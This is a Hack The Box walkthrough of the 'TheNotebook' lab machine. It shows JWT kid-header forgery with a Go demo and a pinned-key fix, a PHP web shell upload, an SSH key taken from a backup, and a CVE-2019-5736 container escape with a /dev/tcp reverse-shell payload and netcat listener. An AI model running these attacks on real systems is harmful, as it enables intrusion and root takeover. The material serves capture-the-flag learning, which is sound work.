Welcome to the TheNotebook writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


TheNotebook

tags: HTB Medium Linux
Platform: Hackthebox
Difficulty: Medium
OS: Linux

Enumeration

Nmap

We run a scan of all ports to see which ones are open.

# nmap -p- -T4 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:29 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.034s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
10010/tcp filtered rxapi

Nmap done: 1 IP address (1 host up) scanned in 15.99 seconds

Now that we know which ports are open, we are going to analyze them in depth.

# nmap -A -Pn -p 22,80,10010 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:30 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.057s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   105.30 ms 10.10.14.1
2   105.53 ms thenotebook.htb (10.129.93.6)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds

GoBuster

For the directory enumeration of the web server on port 80, we are going to use gobuster

# gobuster dir -u http://thenotebook.htb/ -w /usr/share/wordlists/dirb/big.txt -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://thenotebook.htb/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/06 22:36:28 Starting gobuster
===============================================================
/admin (Status: 403)
/login (Status: 200)
/logout (Status: 302)
/register (Status: 200)
===============================================================
2021/03/06 22:36:50 Finished
===============================================================

Cookies

On the web page, once we have registered and logged in, we can see that a cookie called auth is set. Its value is not plain base64 but a JWT: three base64url-encoded segments (header, payload, signature) separated by dots.

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Ing0djFsMGsiLCJlbWFpbCI6ImFAYi5jIiwiYWRtaW5fY2FwIjpmYWxzZX0.Hw1TQj4s9fjDUl_iLGaSu0Rk5dhHJUuJ3ITbxlC-jEtLUrPqUmG4b9SfIdwp_kVq6bo4joE_Lr0aoea_T5UIL1rC9S3lditiH-xdrAnWIoTFMMNLZ9_134QgN_VRu98hs9Tm4EBgwkz6EHN9_Ps8WdRy9_VdguRSOLxfvwEDRnhIXzydNmTxii0RBqR-5voTKTmiUO-gjdZ_T1fSYVSHuyvO4o0mL_8ETuoW9KkYAZhXHdzIdj-DjPAtOAuFYqY4m_xZdsf4DGobHQzOxbMWvjJeXXE3v7DTBgMYFT7_gUTtGqIgOQQeHaO9Hfzmf45VzG0yX9q19ezqiGAlbyoSzJpRvHEyeL8ShK5XAUcl_UhbC7GMjaFbwOKA5BTxV0MVNP7SgIPS2i9DypwsQ_xU68enVmWVAoWZeLLFje18x84QoUK8U02wYWRYYs7gBEV2r9DA7uZwRinMQn66sRqG-qTF0KKRWlcshpctWzCNjkIPSl63wmvyOnvVi_MjdCo-YA7hdpuP80pMEIu_Ry6TK1cZ64Ed1GHnxrBDcoKPDKBUEZvgRHU7bloGLbWDbVoYP0LQv1X5r0W-BLbdHyyn3h54OFxHMCYkJ6V4FDurrdVKezk4QqUL_M7HT5OK_R3266lWtuDa_hc2PzqSsgcy7QgzUbEHKYg_Wsb723iYEfs

Decoding the first two segments, we can identify three parameters that matter: typ, which says the cookie is a JWT; kid, which here is a URL telling the server where to fetch the key used to validate the signature (http://localhost:7070/privKey.key, so the app pulls a private key file over HTTP from the box itself); and admin_cap, which says whether we are an administrator or a normal user. The /admin path that gobuster reported as 403 is gated by that flag.

{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}
{"username":"x4v1l0k","email":"a@b.c","admin_cap":false}
<third segment: the raw RS256 signature bytes, which a plain base64 decoder prints as binary garbage>

The server fetches its verification key from whatever URL the kid header names and does nothing to check where that URL points. Knowing this, we can generate our own RSA key pair, serve the private key file from a web server we control, set kid to that URL and sign a token with admin_cap set to true: the server downloads our key and validates our own signature with it. This only works if the box can reach our machine, so the kid URL has to use our VPN address (10.10.14.164 below).

Exploitation

RSA key creation (-m PEM matters: it writes the traditional PKCS#1 "RSA PRIVATE KEY" PEM that JWT tools accept, whereas the default OpenSSH private key format is not usable as a PEM key):

[email protected]:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ ssh-keygen -t rsa -b 1024 -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:U6nCQGxyuXQzI8mMPU8bV8JQmHD4nhFE9TUFJ/7vE7k [email protected]
The key's randomart image is:
+---[RSA 1024]----+
|   *oB=B+.. =oo  |
|  o.#[email protected] oo + +   |
|   =.O O  + .    |
|    .o=  o   .   |
|     .ooS     . .|
|      o. .     + |
|                +|
|               E |
|                o|
+----[SHA256]-----+
[email protected]:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ cat privKey.key
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQD043XKd62njtc5tly9C1RUZjf9Pqb+7q7xdCxSqFk8a5PgcOyL
pKYOWMKI5hzrd2VBtZVLH/79FB6OgA/lRsxFBXrDaB/EtYfcRhdAY+uNBni9UqQC
OLzDSvhx18EqOQke7BWxitRcKy2IdrviCeI/tiMBgHbZENM1MqIjAKqGdQIDAQAB
AoGAc9MlgjaqrsaTq1tCb7NtFmImdyPr7kXL/q24zPuNAVPMZGpkpwOf+scmc4OL
CB+3h6Wv0BF5FBAxB6swWXvr3oiINJHQhm8QpjUJ61/YsZ/fqCWsJr9HmFfUrajj
CCLl8wdGZQCpXhtsIIlW6rrDyIofLBx4ygTai5BwQ8bVlkECQQD6vUCvcayrghxA
QJKIJRAfe0alh8qQRPnmVqIU3yowG4drdJvPzSypS/xKq0upHH0jH/sCj0IsmbPo
BUQJXoVlAkEA+gbITVr3ZS7ggesw1FmdnGkEwkzNBB0bhAYaaJEBWT6tjUDoetQw
YnAHoUmQkx1CnLoD3DSGYo5JfqUgx7Kz0QJAQAPpa+F90Bvb0pupzZCI2UDD/Kb6
lHLHyoL7xpBjWPzuSgTvctJTQLXhp76sBnT7jegwUar5niFvySDvCeVT8QJBANw1
RwtieAxk+hVTCMGuYDOXBzr+G39pB4gDPBUmyZJJst968IbmBetdEktKmIwJtFaH
Oskidc2t1is10qYvzVECQER3qnQoryNfEoaTa0aXCCDagvEljMHNvKURJjZdtImn
XEVxRZGddV7WSdmjzmuzGGbcRFl7y7EbPz/aTuUoE3Q=
-----END RSA PRIVATE KEY-----

Creation of the signed cookie:

JWT Encoder

HEADER

{
  "alg": "RS256",
  "typ": "JWT",
  "kid":"http://10.10.14.164/privKey.key"
}

PAYLOAD

{"username":"x4v1l0k","email":"[email protected]","admin_cap":true}

VERIFY SIGNATURE

In the verify signature section, we add the RSA private key content that ssh-keygen generated for us before.

We copy the text that appears in the "Encoded" section. Note that the token below comes from a different session of this writeup and will not work as is: its header carries kid http://10.10.15.26:7070/privKey.key, its payload decodes to {"username":"admin       ","email":"as@b.c","admin_cap":1} (username "admin" followed by spaces), and it is signed with a key you do not have. Generate your own token with your VPN address and your privKey.key.

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNS4yNjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluICAgICAgICIsImVtYWlsIjoiYXNAYi5jIiwiYWRtaW5fY2FwIjoxfQ.cI6EeCp4zrIJbQIzofpmnbYThOF2Q6WVesnk14NZrc1pMJw3CaxtdsrB5LOXKqjl-s6ZHufc10q35XLdvWV1148asDssVlGJ0XEyA9E8W2K5C4d4sXXP9NHoxkWLGZGmCdr--4NvnAHXyRmFnQRcNurdh1LoztRAqIVc-rVRu8w

Now it only remains to replace the value of the auth cookie with that token and to start a web server in the directory containing privKey.key, on the host and port named in kid (port 80 here; with Python 3 the equivalent is python3 -m http.server 80):

python -m SimpleHTTPServer 80

And we can now access http://10.129.93.4/admin
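The whole forgery above, from the cookie decoding to the self-signed admin token, as an added example in Go with only the standard library. This is not the author's code or the box's application code: it mints an RS256 token with an attacker key, runs it through a verifier that, like the box, fetches its key from whatever URL kid names (an httptest server stands in for the Python web server on 10.10.14.164), and then through the pinned-key resolver a fixed application would use. The key name notebook-2021 and the claim values are assumptions for the demo.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/base64"
	"encoding/json"
	"encoding/pem"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// mintToken RS256-signs header.payload. kid is attacker-controlled: whatever URL we
// want the verifier to fetch its key from goes straight into the header.
func mintToken(priv *rsa.PrivateKey, kid string, claims map[string]interface{}) (string, error) {
	hdr, _ := json.Marshal(map[string]string{"typ": "JWT", "alg": "RS256", "kid": kid})
	body, _ := json.Marshal(claims)
	signingInput := b64(hdr) + "." + b64(body)
	digest := sha256.Sum256([]byte(signingInput))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, digest[:])
	return signingInput + "." + b64(sig), err
}

// verify checks an RS256 token with whatever key resolve() returns for the header's
// kid. The bug and the fix both live in the resolver, not here.
func verify(token string, resolve func(string) (*rsa.PublicKey, error)) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 { return nil, fmt.Errorf("malformed token") }
	dec := base64.RawURLEncoding.DecodeString
	rawHdr, err1 := dec(parts[0])
	rawBody, err2 := dec(parts[1])
	sig, err3 := dec(parts[2])
	if err1 != nil || err2 != nil || err3 != nil { return nil, fmt.Errorf("bad base64url segment") }
	var hdr map[string]string
	// The token never gets to choose alg: anything but RS256 is rejected outright.
	if err := json.Unmarshal(rawHdr, &hdr); err != nil || hdr["alg"] != "RS256" { return nil, fmt.Errorf("unsupported or unparsable header") }
	pub, err := resolve(hdr["kid"])
	if err != nil { return nil, err }
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	if err := rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig); err != nil { return nil, err }
	var claims map[string]interface{}
	return claims, json.Unmarshal(rawBody, &claims)
}

// resolveFromKidURL is the box's behaviour: fetch whatever the kid names and trust it.
// Like the box (privKey.key) it loads a private key file and uses its public half.
func resolveFromKidURL(kid string) (*rsa.PublicKey, error) {
	resp, err := http.Get(kid) // no allowlist, no scheme or host check
	if err != nil { return nil, err }
	defer resp.Body.Close()
	pemBytes, _ := io.ReadAll(resp.Body)
	block, _ := pem.Decode(pemBytes)
	if block == nil { return nil, fmt.Errorf("no PEM at kid URL") }
	priv, err := x509.ParsePKCS1PrivateKey(block.Bytes)
	if err != nil { return nil, err }
	return &priv.PublicKey, nil
}

// pinnedResolver is the fix: kid is an opaque name looked up in public keys fixed at
// deploy time; a URL, or any unknown name, is rejected before any signature check.
func pinnedResolver(keys map[string]*rsa.PublicKey) func(string) (*rsa.PublicKey, error) {
	return func(kid string) (*rsa.PublicKey, error) {
		if pub, ok := keys[kid]; ok { return pub, nil }
		return nil, fmt.Errorf("unknown kid %q", kid)
	}
}

// Demo forges an admin token with an attacker key that an attacker web server hands out
// (httptest stands in for SimpleHTTPServer on 10.10.14.164) and runs it through both
// verifiers. It returns the admin_cap the kid-fetching verifier accepted and the error
// the pinned verifier produced.
func Demo() (bool, error) {
	appKey, _ := rsa.GenerateKey(rand.Reader, 2048)      // the app's real key; we never see it
	attackerKey, _ := rsa.GenerateKey(rand.Reader, 2048) // stands in for the ssh-keygen key
	attackerPEM := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(attackerKey)})
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.Write(attackerPEM) }))
	defer srv.Close()
	claims := map[string]interface{}{"username": "x4v1l0k", "email": "a@b.c", "admin_cap": true}
	token, _ := mintToken(attackerKey, srv.URL+"/privKey.key", claims) // signing with a fresh key cannot fail
	got, err := verify(token, resolveFromKidURL)
	if err != nil { return false, err }
	admin, _ := got["admin_cap"].(bool)
	_, pinnedErr := verify(token, pinnedResolver(map[string]*rsa.PublicKey{"notebook-2021": &appKey.PublicKey}))
	return admin, pinnedErr
}

func main() { fmt.Println(Demo()) }
```

Running it prints true for the kid-fetching verifier (our forged admin_cap went through) and an "unknown kid" error from the pinned one. The point of the fix is that kid is only ever a lookup name into keys the application already holds; nothing the token says can make the server fetch, parse or trust key material at request time.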

Under Upload File there is a form to upload a file.

We upload a shell.php.

Then we start a listener and click View: the server executes the uploaded PHP and we have our shell.

Post exploitation

Enumeration

Listing the file system, we find home.tar.gz in /var/backups, readable by our low-privileged shell.
Extracting it gives us a copy of noah's home directory, including his .ssh/id_rsa; the matching public key is already in authorized_keys, so after a chmod 600 on the extracted id_rsa we can SSH in as noah with it.

[email protected]:/var/backups$ mkdir /tmp/.htbuser 
[email protected]:/var/backups$ tar -xvf home.tar.gz -C /tmp/.htbuser
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub
[email protected]:/var/backups$

Privilege escalation

Sudo

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

The trailing * lets us append anything after webapp-dev01, so sudo /usr/bin/docker exec -it webapp-dev01 bash gives us a root shell inside the container; that is still not the host, though. We check which Docker version is installed and whether there are exploits for it.

noah@thenotebook:~$ docker version
Client:
 Version:           18.06.0-ce
 API version:       1.38
 Go version:        go1.10.3
 Git commit:        0ffa825
 Built:             Wed Jul 18 19:09:54 2018
 OS/Arch:           linux/amd64
 Experimental:      false

Looking for vulnerabilities affecting Docker 18.06, we find CVE-2019-5736, which affects Docker builds prior to 18.09.2 (the fix was also backported to the 18.06 line as 18.06.3). The bug is not in docker exec itself but in runc, the container runtime Docker bundles: while runc is execing a new process into the container, a process already inside the container can obtain a file descriptor to the host's runc binary via /proc/[pid]/exe and overwrite it. The next runc invocation on the host then runs attacker code as root. Since sudo lets us trigger docker exec as root at will, this is exactly what we need.

Based on the exploit at this link we can exploit CVE-2019-5736 through docker exec.

To exploit it, we download the PoC's main.go and edit the payload line, replacing it with the following (our VPN address and listener port):

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.164/8787 0>&1"

Once saved, we compile it with go build main.go; this produces a binary called main, which is our exploit. go build targets the machine it runs on, so build from a linux/amd64 host or set GOOS=linux GOARCH=amd64 to match the target.

Now we open a shell inside the container

sudo /usr/bin/docker exec -it webapp-dev01 bash

and download the exploit into it with wget from a web server on our machine.

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
[email protected]:~# wget 10.10.14.164/main
--2021-03-07 02:45:21--  http://10.10.14.164/main
Connecting to 10.10.14.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2270002 (2.2M) [application/octet-stream]
Saving to: ‘main’

main                                                        100%[=========================================================================================================================================>]   2.16M   872KB/s    in 2.5s    

2021-03-07 02:45:24 (872 KB/s) - ‘main’ saved [2270002/2270002]

Now we start a listener on port 8787 and run the exploit inside the container. When it reports [+] Overwritten /bin/sh successfully, we run the following from another noah session, twice:

sudo /usr/bin/docker exec -it webapp-dev01 bash

The first docker exec gives the exploit a runc process to latch onto: it grabs a handle to the host's runc binary through /proc/[pid]/exe and overwrites it with our payload script. The second docker exec executes that replaced binary, i.e. our payload, as root on the host.

Once the second connection has been made, the exploit prints the following lines, indicating that it has obtained its write handle and finished.

[+] Found the PID: 54
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc000350060}

And in the terminal we had listening we now have a shell as root on the host: note the hostname thenotebook rather than the container's. Keep in mind that the host's runc binary is now our payload script, so docker exec and docker run on that host stay broken until it is restored; acceptable on a lab box that gets reset, destructive anywhere else.

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.164] from (UNKNOWN) [10.129.93.75] 42444
bash: cannot set terminal process group (47472): Inappropriate ioctl for device
bash: no job control in this shell
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# id
id
uid=0(root) gid=0(root) groups=0(root)
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# hostname
hostname
thenotebook